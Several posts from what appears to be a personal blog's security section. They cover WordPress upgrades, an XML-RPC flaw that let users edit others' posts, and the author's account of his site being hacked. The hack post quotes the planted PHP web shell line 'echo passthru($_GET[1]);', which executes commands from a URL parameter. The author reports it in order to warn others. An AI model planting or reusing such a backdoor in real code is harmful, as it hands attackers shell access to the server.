Shuron's Letters» security

Back again

shuron — Wed, 16 Apr 2008 21:58:47 +0000

It’s pretty difficult to start write again after such pause. My wife and my Son are away for a holidays, so I must found some time to write to my blog. But where to begin. So many thing are happened in the last time.

Ok , I know I begin with the introducing of the My wife’s Blog. It’s about books, travel and geography, because my darling do study at the Faculty of Geography. You might find it also interesting even when you will not find there many articles about IT However her English is much better than my

Back to this blog. As you know Wordpress 2.5 is out. And somehow there are no security updates at that time. How it comes? Did the Wordpress guys didn’t their work really good this time? Seems to be. So I consider to upgrade in the next time.

Share and Enjoy:

Wordpress 2.3.3 fixes XML-RPC bug

shuron — Tue, 05 Feb 2008 08:06:43 +0000

Please upgrade your Wordpress blog as sun as possible to the released version 2.3.3, because there are security reasons for it. Further check the content of your posts in the code perspective, because maybe it was changed by some intruders, which have possibly used XML-RCP Bug in the Wordpress version 2.3.2.

… A flaw was found in our XML-RPC implementation such that a specially crafted request would allow any valid user to edit posts of any other user on that blog. …
So e.g. I found some strange code lines in my several posts looking like:

I definitely have not inserted them in to my posts. So how did they get into it? They could be inserted by some Plug-in but they looks so as should be hidden to my eyes, and make few sense for any plug in. Therefore my theory is that they where inserted by bad guys, that used out some of security bugs in wordpress. Presumably they may be used mentioned XML-RPC Bug in the Wordpress version 2.3.2.

Please let me know if you know more about these strange lines.

P.S. In addition i have deleted some unknown users, because my observation point me to some the believe that this could be the violation of security to. So if you wanna subscribe to the comments or Posts, use RSS. Thank you for understanding.

Share and Enjoy:

I was hacked, thank open source

shuron — Fri, 13 Jul 2007 14:50:02 +0000

Maybe you notice the downtime of this site last days. Unfortunately it was hacked by someone for unknown purpose. The attackers uses some exploit in wordpress or some plug in or maybe of k2 theme. Some malfunction of these open source components was used out, so that attacker have added lines like

echo passthru($_GET[1]);

to some of php files. That gives them access to shell of my user account on this server. Bad thing it that other domains of mine where affected too. The “Forbidden” you probably have seen, was initiated by my server administrator to prevent broadening of the attack.

I could not find the exactly place of the initial exploit yet. But attackers have left many of traces. So that I was able to reconstruct the rest and remove backdoors. This was a new experience, especially I learned in seconds, that it is better to separate my popular projects from insecure open source playgrounds, like this site actually is.

And on holbreich .de i turned all possible security mechanisms on, till final clarification is done. So you can’t leave comments at the moment cause we are still under carnitine!

P.S. That hackers left some strange move on one of my domains for download to use out the traffic and space. Some was some strange comedy about two gay man. It was in some strange language, so I could not laugh

Share and Enjoy: